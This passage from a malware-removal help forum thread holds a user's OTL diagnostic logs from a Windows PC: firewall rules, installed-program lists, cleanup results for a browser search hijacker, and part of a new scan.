"{68B0430B-EFE3-4DF4-93C4-A53C618F189D}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{6D8569E4-7E69-4221-A03C-FC355CCA5FFC}" = protocol=17 | dir=in | app=c:\program files (x86)\opera\opera.exe | 
"{6EE11953-382D-4BF0-8FCA-7FA89D19B2B2}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgemca.exe | 
"{70D0AF06-BA22-4DC4-B979-4CE7E7A6D892}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{7259F815-5E4B-4ACF-A593-434151EDC481}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgnsa.exe | 
"{733F5C1B-2A40-4A25-B91F-41345E2AE38D}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"{747ABCF4-1887-41FE-821C-3E8920B32DD8}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{79B63810-7AEC-4897-8C31-52BABF4CEB6F}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgdiagex.exe | 
"{7B9E43A0-36FE-44BC-B4F4-0C085915FFA6}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgmfapx.exe | 
"{880BD4C6-D952-4F1D-88DE-00C4297C6F54}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgemca.exe | 
"{93CADEEE-9203-42D9-B48C-70754201A8A9}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 | 
"{9FF75489-9C8C-4560-8FD9-32F130A3590A}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"{A1115A83-3F58-4BB5-B835-46781B677C97}" = dir=in | app=c:\program files (x86)\common files\apple\apple application support\webkit2webprocess.exe | 
"{A92BA0A8-1CB1-4B87-BFB7-DC2C8B12BAAC}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 | 
"{B51F4220-FC99-44E8-B2A2-CA11B872D1C3}" = protocol=6 | dir=in | app=c:\users\alan\appdata\local\temp\~osa093.tmp\rlvknlg.exe | 
"{BA9E8C22-E43A-4DED-A5A0-7237D2C2E3BD}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{BBE2EF81-815F-4832-A0C1-BA9D1CCF9D10}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{BC38FFF4-C1D2-4FF9-A3A7-B67DFEDF52EB}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{BF2B3A7A-9744-4C8F-A46F-C09259BDCB2E}" = protocol=17 | dir=in | app=c:\program files (x86)\backlinkbeast\backlinkbeast.exe | 
"{C9BFC780-1762-4F31-A316-1F24701A84D6}" = protocol=17 | dir=in | app=c:\users\alan\appdata\roaming\utorrent\utorrent.exe | 
"{CA565F3D-B961-4333-8A98-0C18109F6052}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{CD4A3B97-88B2-4F6F-A3DB-381705DE0B44}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{DDD8B34A-6987-4B22-AEE4-D215CD1370F4}" = protocol=6 | dir=in | app=c:\program files (x86)\backlinkbeast\backlinkbeast.exe | 
"{E7C2B351-2D90-412A-89BC-D52BF91AC0CC}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{F908FEA0-7C05-4D78-A4FB-114D871F9FD6}" = protocol=17 | dir=in | app=c:\users\alan\appdata\roaming\dropbox\bin\dropbox.exe | 
"{FB96A5B1-33C3-4635-BADB-DD03E60989A1}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\groove.exe | 
"TCP Query User{18F9DCE1-D2DD-47D1-AE0A-BC0BBA69557E}C:\program files (x86)\java\jre7\bin\java.exe" = protocol=6 | dir=in | app=c:\program files (x86)\java\jre7\bin\java.exe | 
"TCP Query User{6CB19EBF-9ADC-47AA-842B-FA026394B2D2}C:\program files (x86)\filezilla ftp client\filezilla.exe" = protocol=6 | dir=in | app=c:\program files (x86)\filezilla ftp client\filezilla.exe | 
"TCP Query User{CB14B550-951D-4C75-BFD5-1707B0554192}C:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe" = protocol=6 | dir=in | app=c:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe | 
"UDP Query User{27625680-604E-43B2-A475-C4B165543997}C:\program files (x86)\java\jre7\bin\java.exe" = protocol=17 | dir=in | app=c:\program files (x86)\java\jre7\bin\java.exe | 
"UDP Query User{33E7F37C-7127-493D-98E2-A290A559C0CF}C:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe" = protocol=17 | dir=in | app=c:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe | 
"UDP Query User{A9DF4872-4C7F-4FF5-AE48-FF291A58BFEF}C:\program files (x86)\filezilla ftp client\filezilla.exe" = protocol=17 | dir=in | app=c:\program files (x86)\filezilla ftp client\filezilla.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0225AD21-F3E2-4916-BFF3-65D3F9052582}" = iTunes
"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{26A24AE4-039D-4CA4-87B4-2F86417021FF}" = Java 7 Update 21 (64-bit)
"{2F72F540-1F60-4266-9506-952B21D6640D}" = Apple Mobile Device Support
"{350AA351-21FA-3270-8B7A-835434E766AD}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{5CE7E3F5-9803-4F32-AA89-2D8848A80109}" = Microsoft LifeCam
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{8338783A-0968-3B85-AFC7-BAAE0A63DC50}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570
"{90120000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2007
"{90120000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2007
"{90120000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{9C5A08BF-BB99-4998-81BD-F6CC32483B34}" = Microsoft Corporation
"{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}" = Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B143BE44-8723-315E-9413-011C55873C0E}" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"{B6E3757B-5E77-3915-866A-CCFC4B8D194C}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{EE936C7A-EA40-31D5-9B65-8E3E089C3828}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148
"HP Photosmart Essential" = HP Photosmart Essential 3.0
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft Visual Studio 2010 Tools for Office Runtime (x64)" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"NVIDIA Drivers" = NVIDIA Drivers
"OsdMaestro" = HP On-Screen Cap/Num/Scroll Lock Indicator
"WinRAR archiver" = WinRAR 5.01 (64-bit)
"ZTE USB Driver" = ZTE USB Driver
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{08D2E121-7F6A-43EB-97FD-629B44903403}" = Microsoft_VC90_CRT_x86
"{09633A5E-3089-41A8-9FF1-382171423C5D}" = PSSWCORE
"{0E7DBD52-B097-4F2B-A7C7-F105B0D20FDB}" = LightScribe System Software  1.14.17.1
"{15B8AFD9-92E9-4E86-96D9-83FAC510B82E}" = HPPhotoSmartPhotobookWebPack1
"{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}" = Microsoft Works
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}" = CyberLink DVD Suite Deluxe
"{22F761D1-8063-4170-ADF7-2D2F47834CA9}" = VideoToolkit01
"{236BB7C4-4419-42FD-0409-1E257A25E34D}" = Adobe Photoshop CS2
"{254C37AA-6B72-4300-84F6-98A82419187E}" = Hewlett-Packard Active Check for Health Check
"{362755FC-209C-4B69-93C3-BE8101A29F8B}" = MySQL Server 5.0
"{40BF1E83-20EB-11D8-97C5-0009C5020658}" = Power2Go
"{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}" = Apple Application Support
"{55979C41-7D6A-49CC-B591-64AC1BBE2C8B}" = HP Picasso Media Center Add-In
"{5DA8F6CD-C70E-39D8-8430-3D9808D6BD17}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411
"{5DAA9C36-8F8B-462F-8CCA-E205BC3751F5}" = HP Active Support Library
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{669D4A35-146B-4314-89F1-1AC3D7B88367}" = Hewlett-Packard Asset Agent for Health Check
"{6B976ADF-8AE8-434E-B282-A06C7F624D2F}" = Python 2.5.2
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{786C5747-1033-0000-B58E-000000000001}" = Adobe Stock Photos 1.0
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}" = Skype™ 6.14
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8EDBA74D-0686-4C99-BFDD-F894678E5B39}" = Adobe Common File Installer
"{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_ENTERPRISE_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_ENTERPRISE_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_ENTERPRISE_{2314F9A1-126F-45CC-8A5E-DFAF866F3FBC}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90120000-002A-0000-1000-0000000FF1CE}_ENTERPRISE_{664655D8-B9BB-455D-8A58-7EAF7B0B2862}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-002A-0409-1000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007
"{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2007
"{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
"{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2007
"{90120000-00BA-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0114-0409-0000-0000000FF1CE}" = Microsoft Office Groove Setup Metadata MUI (English) 2007
"{90120000-0114-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0116-0409-1000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{92D58719-BBC1-4CC3-A08B-56C9E884CC2C}" = Microsoft_VC80_CRT_x86
"{95120000-00AF-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint Viewer 2007 (English)
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9DBA770F-BF73-4D39-B1DF-6035D95268FC}" = HP Customer Feedback
"{A0640EC2-B97E-4FC1-AD14-227C9E386BB4}" = HP Recovery Manager RSS
"{A2016015-8323-4AF8-8B3E-F56239D7D59D}" = HP Demo
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{AF37176A-78CA-545B-34EF-8B6A21514DD1}" = Adobe Help Manager
"{B3BC9DB1-0B0A-48B0-B86B-EA77CAA7F800}" = Microsoft Corporation
"{B74D4E10-1033-0000-0000-000000000001}" = Adobe Bridge 1.0
"{C27C82E4-9C53-4D76-9ED3-A01A3D5EE679}" = HP Customer Experience Enhancements
"{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = LabelPrint
"{C779648B-410E-4BBA-B75B-5815BCEFE71D}" = Safari
"{C8FD5BC1-92EF-4C15-92A9-F9AC7F61985F}" = HP Update
"{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"{D74CFE48-087F-46E1-80E6-E2950E1A8DCE}" = HP Photosmart Essential 2.5
"{DDFB9315-8964-B381-2167-0C0FE726CD99}" = Tracker
"{E535C94A-B87F-4182-BEA8-1E9322078D3E}" = Cards_Calendar_OrderGift_DoMorePlugout
"{E9787678-1033-0000-8E67-000000000001}" = Adobe Help Center 1.0
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{f32502b5-5b64-4882-bf61-77f23edcac4f}" = HP Total Care Advisor
"{F405DC00-37F3-4A5F-97F4-C1310CCEE53A}" = HP Easy Setup - Frontend
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"Adobe Flash Player ActiveX" = Adobe Flash Player ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 12 Plugin
"Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0409-1E257A25E34D}" = Adobe Photoshop CS2
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"Audacity_is1" = Audacity 2.0.5
"chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1" = Adobe Help Manager
"com.elance.tracker" = Tracker
"ENTERPRISE" = Microsoft Office Enterprise 2007
"FileZilla Client" = FileZilla Client 3.7.0.2
"Google Chrome" = Google Chrome
"InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
"Mozilla Firefox 27.0.1 (x86 en-US)" = Mozilla Firefox 27.0.1 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Notepad++" = Notepad++
"Opera 12.14.1738" = Opera 12.14
"PC-Doctor for Windows" = Hardware Diagnostic Tools
"Revo Uninstaller" = Revo Uninstaller 1.95
"winscp3_is1" = WinSCP 5.1.4
 
========== HKEY_USERS Uninstall List ==========
 
[HKEY_USERS\S-1-5-21-465606687-3642172284-1488456202-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 25/03/2014 13:45:24 | Computer Name = Alan-PC | Source = WinMgmt | ID = 10
Description = 
 
[ System Events ]
Error - 25/03/2014 13:45:25 | Computer Name = Alan-PC | Source = Service Control Manager | ID = 7000
Description = 
 
Error - 25/03/2014 13:45:25 | Computer Name = Alan-PC | Source = Service Control Manager | ID = 7000
Description = 
 
Error - 25/03/2014 13:45:25 | Computer Name = Alan-PC | Source = Service Control Manager | ID = 7026
Description = 
 
 
< End of report >
Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Ok here's the log. But even though it says its removed them, the minute i start up chrome again it goes straight back to conduit search and the extension is still installed.

 

All processes killed
========== OTL ==========
Prefs.js: S", "" removed from browser.search.defaultenginename,S
Prefs.js: "" removed from browser.search.order.1
Prefs.js: S", "" removed from browser.search.order.1,S
Prefs.js: S", "" removed from browser.search.selectedEngine,S
C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\extensions\tafo@oescgz.org\content folder moved successfully.
C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\extensions\tafo@oescgz.org folder moved successfully.
C:\Users\Alan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mggdnalmmmoogbjpihpbafcjfmoppdkk\2.4_0 folder moved successfully.
C:\Users\Alan\AppData\Roaming\uTorrent folder moved successfully.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Alan\Desktop\cmd.bat deleted successfully.
C:\Users\Alan\Desktop\cmd.txt deleted successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: Alan
->Temp folder emptied: 3693885 bytes
->Temporary Internet Files folder emptied: 87387167 bytes
->Java cache emptied: 7098229 bytes
->FireFox cache emptied: 58714732 bytes
->Google Chrome cache emptied: 463384655 bytes
->Apple Safari cache emptied: 38018048 bytes
->Opera cache emptied: 12761350 bytes
->Flash cache emptied: 3045 bytes
 
User: All Users
 
User: AppData
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1446602748 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 59585 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 35782730 bytes
RecycleBin emptied: 69681296 bytes
 
Total Files Cleaned = 2,120.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 03282014_164854
 
Files\Folders moved on Reboot...
File\Folder C:\Windows\temp\ib62 not found!
File\Folder C:\Windows\temp\ib63 not found!
File\Folder C:\Windows\temp\ib64 not found!
File\Folder C:\Windows\temp\ib65 not found!
File\Folder C:\Windows\temp\ib66 not found!
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...
Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Thanks for all your help. Here's the log:

 

OTL logfile created on: 28/03/2014 18:50:22 - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Alan\Desktop
64bit-Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.87 Gb Total Physical Memory | 2.30 Gb Available Physical Memory | 59.41% Memory free
7.96 Gb Paging File | 6.06 Gb Available in Paging File | 76.11% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 451.62 Gb Total Space | 250.02 Gb Free Space | 55.36% Space Free | Partition Type: NTFS
Drive D: | 14.14 Gb Total Space | 1.92 Gb Free Space | 13.55% Space Free | Partition Type: NTFS
 
Computer Name: ALAN-PC | User Name: Alan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - File not found -- 
PRC - [2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2007/04/18 15:01:34 | 000,065,536 | ---- | M] (Hewlett-Packard Company) -- C:\hp\support\hpsysdrv.exe
PRC - [2006/05/26 03:50:24 | 004,149,248 | ---- | M] () -- C:\Program Files (x86)\MySQL\MySQL Server 5.0\bin\mysqld-nt.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/13 04:04:54 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\c5213af29d521ee19cc55983f8c2037c\System.Management.ni.dll
MOD - [2014/02/13 04:03:05 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\e3ab5ab0fbb86c36425e6902e54a547b\System.Runtime.Remoting.ni.dll
MOD - [2014/02/13 04:03:02 | 000,627,200 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\24c666e940e61baf4d33315346a03ab6\System.Transactions.ni.dll
MOD - [2014/02/13 04:03:01 | 000,627,712 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.ni.dll
MOD - [2014/02/13 04:03:01 | 000,280,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.Wrapper.dll
MOD - [2014/02/13 04:02:53 | 000,978,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\d17ceca243fabda73eefb21d9bd072df\System.Configuration.ni.dll
MOD - [2014/02/13 03:49:56 | 005,462,016 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\f87e71868aedbc6c4e8fe7160d17c4ab\System.Xml.ni.dll
MOD - [2014/02/13 03:49:40 | 012,434,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d2b605fc7deda872727d1ed37710420e\System.Windows.Forms.ni.dll
MOD - [2014/02/13 03:49:31 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\8e6265a54260bddfc05951e764f5bc48\System.Drawing.ni.dll
MOD - [2014/02/13 03:49:17 | 006,622,208 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\6252b82373099322bef5f577bab408b6\System.Data.ni.dll
MOD - [2014/02/13 03:49:06 | 000,368,128 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\71e362b114f878201540696b6d66bf45\PresentationFramework.Aero.ni.dll
MOD - [2014/02/13 03:49:05 | 014,329,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\b46f1c203d1e4bec4597adf684ec1d41\PresentationFramework.ni.dll
MOD - [2014/02/13 03:48:46 | 012,218,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\07d57714fff9db216537473f4a777f22\PresentationCore.ni.dll
MOD - [2014/02/13 03:48:32 | 003,325,440 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\d981bccab40fbbdc1d35bf2a58c947b7\WindowsBase.ni.dll
MOD - [2014/02/13 03:48:28 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\957628d9dd7b3bf370a56dca7835a997\System.ni.dll
MOD - [2014/02/13 03:48:21 | 011,497,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\694a37a84dee2cd2609a1dfab27c0433\mscorlib.ni.dll
MOD - [2013/01/28 13:08:56 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2013/01/28 13:08:28 | 001,242,512 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2009/04/11 06:28:21 | 000,368,640 | ---- | M] () -- C:\WINDOWS\SysWOW64\msjetoledb40.dll
